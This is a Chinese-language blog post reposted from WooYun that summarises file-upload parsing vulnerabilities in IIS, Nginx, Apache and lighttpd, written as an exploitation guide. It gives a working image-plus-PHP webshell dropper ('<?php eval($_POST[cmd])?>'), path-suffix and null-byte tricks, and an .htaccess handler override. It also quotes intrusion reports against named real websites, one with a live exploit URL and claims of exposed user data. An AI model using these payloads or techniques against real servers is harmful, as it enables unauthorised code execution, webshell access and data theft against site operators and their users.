一、IIS 5.x/6.0解析漏洞
IIS 6.0解析利用方法有两种
1.目录解析
/xx.asp/xx.jpg
2.文件解析
wooyun.asp;.jpg 或wooyun.org:.jpg(需抓包修改文件名)
第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。
例如创建目录 wooyun.asp,那么
/wooyun.asp/1.jpg
将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。
第二种,在IIS6.0下,分号后面的不被解析,也就是说wooyun.asp;.jpg会被服务器看成是wooyun.asp。而wooyun.asp:.jpg这样路径叫做”NTFS数据流”,可参考:http://www.jinglingshu.wiki/?p=8435。
还有IIS6.0 默认的可执行文件除了asp还包含这三种
/wooyun.asa /wooyun.cer /wooyun.cdx
这三种后缀可被执行,主要是由于在 IIS 默认配置中,这几个后缀默认由 asp.dll 来解析,所以执行权限和 .asp 一摸一样,你可在配置中自行删除该后缀,以防止安全隐患。乌云上的IIS 6.0解析漏洞利用案例
http://www.wooyun.org/searchbug.php?q=IIS6.0
二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。
常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
e.g. copy xx.jpg/b + yy.txt/a xy.jpg
######################################
/b 即二进制[binary]模式
/a 即ascii模式 xx.jpg正常图片文件
yy.txt 内容
<?PHP fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件
######################################
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php 密码 cmd
这个漏洞案例
WooYun: 用友软件某分站SQL注入漏洞+nginx解析漏洞
WooYun: 新浪网分站多处安全漏洞(nginx解析+SQL注射等)小礼包
WooYun: kingsoft.com某x级域名nginx解析漏洞+爆路径
三、Nginx <8.03?空字节代码执行漏洞
影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
在Fast-CGI关闭的情况下,Nginx <=0.8.37 依然存在解析漏洞。在一个文件路径(/xx.jpg)后面加上%00.php会将 /xx.jpg%00.php 解析为 php 文件。因此Nginx在图片中嵌入PHP代码然后通过访问
xxx.jpg%00.php
来执行其中的代码
Nginx 空字节代执行漏洞案例
http://www.wooyun.org/searchbug.php?q=%2500.php
四、Apache解析漏洞
目前所有的apache版本中均存在此问题,但只适用于以module方式解析php的apache,使用fastcgi方式解析php的apache不受影响,使用cgi方式解析php的apache是否影响未测试。参考:http://www.91ri.org/7789.html
Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.
比如 wooyun.php.owf.rar “.owf”和”.rar”?这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.
如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀
Apache解析漏洞案例
http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90
五、其他
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空 格和点都会被windows自动消除,这样也可以getshell。
如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:?
<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。
六、lighttpd
xx.jpg/xx.php
转自:http://drops.wooyun.org/papers/539
参考资料:http://www.91ri.org/3938.html
—————————————————————————————————————————————————————
示例:
简要描述:
成都地铁官网存在fckeditor上传解析漏洞,能直接获得系统权限,并且能对内网进行渗透。
详细说明:
能直接获得系统权限,并且能对内网进行渗透
漏洞证明:
能直接获得系统权限,并且能对内网进行渗透
修复方案:
你懂的
————————————————————————————————————————————————————
漏洞标题: 安卓开发平台存在上传漏洞和Apache解析漏洞,成功获取webshell
简要描述:
由于安卓开发平台对于上传文件的过滤不严导致可以直接上传PHP木马,并且存在Apache解析漏洞,上传PHP马后可以直接拿到webshell。
详细说明:
在http://www.rexsee.com/上注册任意账号,然后创建图片集应用,接下来上传一个图片马
解析来访问你图片马的地址就是菜刀连接地址
漏洞证明:
修复方案:
过滤上传的文件
————————————————————————————————————————————————–
ngnix解析漏洞案例:
http://bbs.youxi.56.com存在nginx的解析漏洞。。
漏洞证明:
http://bbs.youxi.56.com/attachments/swfupload/1307311753b2bbb5703bb3deb3.jpg%00.php
随便传了一个shell
网站很多备份 以及很多内部连接的程序 我什么都没有动!
截点数据证明下
21W用户带盐。。
权限太宽松了
我没有下载 没看偷看 什么都没有做
ps:为什么数据库root密码是空的。。
修复方案:
升级nginx。。
转载请注明:jinglingshu的博客 » 解析漏洞总结